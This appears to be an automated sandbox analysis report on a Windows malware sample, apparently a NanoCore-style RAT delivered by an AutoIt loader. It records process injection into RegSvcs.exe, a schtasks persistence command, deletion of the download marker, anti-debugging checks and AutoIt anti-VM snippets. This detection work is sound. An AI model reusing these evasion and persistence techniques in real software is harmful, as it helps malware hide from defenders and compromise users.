    Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp
    Source: Binary string: RegSvcs.pdb source: dhcpmon.exe
    Source: dUzAkYsvl8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: dUzAkYsvl8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: dUzAkYsvl8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: dUzAkYsvl8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: dUzAkYsvl8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation:

    .NET source code contains potential unpacker
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020E336 push ecx; ret 0_2_0020E349
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020D870 push eax; ret 0_2_0020D88E
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01146BD5 push ecx; ret 4_2_01146BE8
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01146BD5 push ecx; ret 10_2_01146BE8
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01146BD5 push ecx; ret 20_2_01146BE8
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0113EE30 LoadLibraryA,GetProcAddress,4_2_0113EE30
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile created: C:\Users\user\77066510\__tmp_rar_sfx_access_check_5166187
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

    Persistence and Installation Behavior:

    Drops PE files with a suspicious file extension
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile created: C:\Users\user\77066510\cjlaro.pif
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

    Boot Survival:

    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp'

    Hooking and other Techniques for Hiding and Protection:

    Hides that the sample has been downloaded from the Internet (zone.identifier)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011643FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_011643FF
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011AA2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,4_2_011AA2EA
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011643FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_011643FF
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011AA2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_011AA2EA
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_011643FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,20_2_011643FF
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\77066510\cjlaro.pifProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    Yara detected AntiVM autoit script
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR
    Source: C:\Users\user\77066510\cjlaro.pif TID: 4968Thread sleep count: 74 > 30
    Source: C:\Users\user\77066510\cjlaro.pif TID: 4968Thread sleep count: 105 > 30
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5496Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\77066510\cjlaro.pif TID: 7144Thread sleep count: 68 > 30
    Source: C:\Users\user\77066510\cjlaro.pif TID: 7144Thread sleep count: 85 > 30
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3450
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5826
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: foregroundWindowGot 667
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
    Source: cjlaro.pif, 00000004.00000003.320833602.0000000004CFF000.00000004.00000001.sdmp, Binary or memory string: VMwaretray.exe
    Source: cjlaro.pif, 00000014.00000003.355134074.0000000003911000.00000004.00000001.sdmp, Binary or memory string: If ProcessExists("VboxService.exe") Then
    Source: cjlaro.pif, 00000014.00000003.374937841.0000000003921000.00000004.00000001.sdmp, Binary or memory string: rocessExists("VboxService.exe") Then
    Source: cjlaro.pif, 00000014.00000003.375222511.0000000003936000.00000004.00000001.sdmp, Binary or memory string: VMwareUser.exeE97637D6X7|s
    Source: cjlaro.pif, 00000004.00000003.310288716.0000000004CD1000.00000004.00000001.sdmp, Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
    Source: cjlaro.pif, 00000014.00000003.375222511.0000000003936000.00000004.00000001.sdmp, Binary or memory string: VMwaretray.exe+3
    Source: cjlaro.pif, 00000004.00000003.330888891.0000000004CDC000.00000004.00000001.sdmp, Binary or memory string: VMwareUser.exe5FB536C7
    Source: cjlaro.pif, 00000014.00000003.375222511.0000000003936000.00000004.00000001.sdmp, Binary or memory string: VMwareService.exe
    Source: cjlaro.pif, 00000014.00000002.380204454.0000000001577000.00000004.00000020.sdmp, Binary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA
    Source: cjlaro.pif, 00000014.00000003.374937841.0000000003921000.00000004.00000001.sdmp, Binary or memory string: If ProcessExists("VMwaretray.exe") Then
    Source: cjlaro.pif, 00000004.00000003.320833602.0000000004CFF000.00000004.00000001.sdmp, cjlaro.pif, 00000014.00000003.375222511.0000000003936000.00000004.00000001.sdmp, Binary or memory string: VBoxTray.exe
    Source: cjlaro.pif, 00000014.00000003.374937841.0000000003921000.00000004.00000001.sdmp, Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
    Source: cjlaro.pif, 00000014.00000002.380204454.0000000001577000.00000004.00000020.sdmp, Binary or memory string: 63}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d8Y
    Source: cjlaro.pif, 00000004.00000003.310288716.0000000004CD1000.00000004.00000001.sdmp, Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenN8b
    Source: cjlaro.pif, 00000014.00000003.374937841.0000000003921000.00000004.00000001.sdmp, Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thennw9
    Source: cjlaro.pif, 00000004.00000003.320782139.0000000004CE3000.00000004.00000001.sdmp, Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenN8
    Source: cjlaro.pif, 00000004.00000003.320833602.0000000004CFF000.00000004.00000001.sdmp, Binary or memory string: VboxService.exe"6
    Source: cjlaro.pif, 00000014.00000003.375222511.0000000003936000.00000004.00000001.sdmp, Binary or memory string: VboxService.exe
    Source: cjlaro.pif, 00000004.00000003.310288716.0000000004CD1000.00000004.00000001.sdmp, cjlaro.pif, 00000014.00000003.374937841.0000000003921000.00000004.00000001.sdmp, Binary or memory string: If ProcessExists("VBoxTray.exe") Then
    Source: RegSvcs.exe, 00000005.00000002.556279118.0000000000E08000.00000004.00000020.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020D353 VirtualQuery,GetSystemInfo,0_2_0020D353
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001FA307 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,0_2_001FA307
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0020AFB9
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_00219FD3 FindFirstFileExA,0_2_00219FD3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0116399B GetFileAttributesW,FindFirstFileW,FindClose,4_2_0116399B
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01182408 FindFirstFileW,LdrInitializeThunk,Sleep,FindNextFileW,FindClose,4_2_01182408
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0117280D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011A8877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_011A8877
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01161A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_01161A73
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0118CAE7 FindFirstFileW,FindNextFileW,FindClose,4_2_0118CAE7
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,4_2_0117BCB3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0117BF17
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0118DE7C FindFirstFileW,FindClose,4_2_0118DE7C
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01182408 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_01182408
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0116399B GetFileAttributesW,FindFirstFileW,FindClose,10_2_0116399B
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0117280D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011A8877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_011A8877
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01161A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_01161A73
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0118CAE7 FindFirstFileW,FindNextFileW,FindClose,10_2_0118CAE7
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,10_2_0117BCB3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0117BF17
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0118DE7C FindFirstFileW,FindClose,10_2_0118DE7C
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0116399B GetFileAttributesW,FindFirstFileW,FindClose,20_2_0116399B
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01182408 FindFirstFileW,LdrInitializeThunk,Sleep,FindNextFileW,FindClose,20_2_01182408
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0117280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_0117280D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01161A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_01161A73
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0118CAE7 FindFirstFileW,FindNextFileW,FindClose,20_2_0118CAE7
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0117BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,20_2_0117BCB3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0117BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_0117BF17
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0118DE7C FindFirstFileW,FindClose,20_2_0118DE7C
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0113EE30 LoadLibraryA,GetProcAddress,4_2_0113EE30
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_00216AF3 mov eax, dword ptr fs:[00000030h]0_2_00216AF3
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0020E4F5
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0021ACA1 GetProcessHeap,0_2_0021ACA1
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01146374 GetStartupInfoW,__heap_init,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineW,__wsetargv,__amsg_exit,__wsetenvp,__amsg_exit,__cinit,__amsg_exit,__wwincmdln,LdrInitializeThunk,4_2_01146374
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0118A35D BlockInput,4_2_0118A35D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Memory allocated: page read and write | page guard
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020E643 SetUnhandledExceptionFilter,0_2_0020E643
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0020E4F5
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020E7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0020E7FB
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_00217BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00217BE1
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0114F170 SetUnhandledExceptionFilter,4_2_0114F170
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0114A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0114A128
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01147CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_01147CCD
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0114A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0114A128
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0114F170 SetUnhandledExceptionFilter,10_2_0114F170
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01147CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_01147CCD
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0114A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_0114A128
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01147CCD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_01147CCD

    HIPS / PFW / Operating System Protection Evasion:

    Allocates memory in foreign processes
    Source: C:\Users\user\77066510\cjlaro.pif, Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000 protect: page execute and read and write
    Source: C:\Users\user\77066510\cjlaro.pif, Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F60000 protect: page execute and read and write
    Injects a PE file into a foreign processes
    Source: C:\Users\user\77066510\cjlaro.pif, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000 value starts with: 4D5A
    Source: C:\Users\user\77066510\cjlaro.pif, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F60000 value starts with: 4D5A
    Writes to foreign memory regions
    Source: C:\Users\user\77066510\cjlaro.pif, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000
    Source: C:\Users\user\77066510\cjlaro.pif, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 361000
    Source: C:\Users\user\77066510\cjlaro.pif, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F60000
    Source: C:\Users\user\77066510\cjlaro.pif, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DFA000
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011643FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_011643FF
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exe, Process created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnr
    Source: C:\Users\user\77066510\cjlaro.pif, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp'
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
    Source: C:\Users\user\77066510\cjlaro.pif, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    Source: C:\Windows\System32\wscript.exe, Process created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01166C61 LogonUserW,4_2_01166C61
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0113D7A0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,4_2_0113D7A0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01163321 __wcsicoll,mouse_event,__wcsicoll,mouse_event,4_2_01163321
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117602A GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,4_2_0117602A
    Source: RegSvcs.exe, 00000005.00000002.558858060.0000000002EBB000.00000004.00000001.sdmp, cjlaro.pif, 00000014.00000003.375222511.0000000003936000.00000004.00000001.sdmp, Binary or memory string: Program Manager
    Source: cjlaro.pif, Binary or memory string: Shell_TrayWnd
    Source: RegSvcs.exe, 00000005.00000002.557519174.0000000001420000.00000002.00020000.sdmp, Binary or memory string: Progman
    Source: cjlaro.pif, 00000004.00000003.320782139.0000000004CE3000.00000004.00000001.sdmp, cjlaro.pif, 00000014.00000003.374937841.0000000003921000.00000004.00000001.sdmp, Binary or memory string: If WinGetText("Program Manager") = "0" Then
    Source: cjlaro.pif, 00000004.00000003.320833602.0000000004CFF000.00000004.00000001.sdmp, Binary or memory string: Program ManagerP7
    Source: RegSvcs.exe, 00000005.00000002.557519174.0000000001420000.00000002.00020000.sdmp, Binary or memory string: Progmanlock
    Source: RegSvcs.exe, 00000005.00000002.558858060.0000000002EBB000.00000004.00000001.sdmp, Binary or memory string: Program Manager\2A
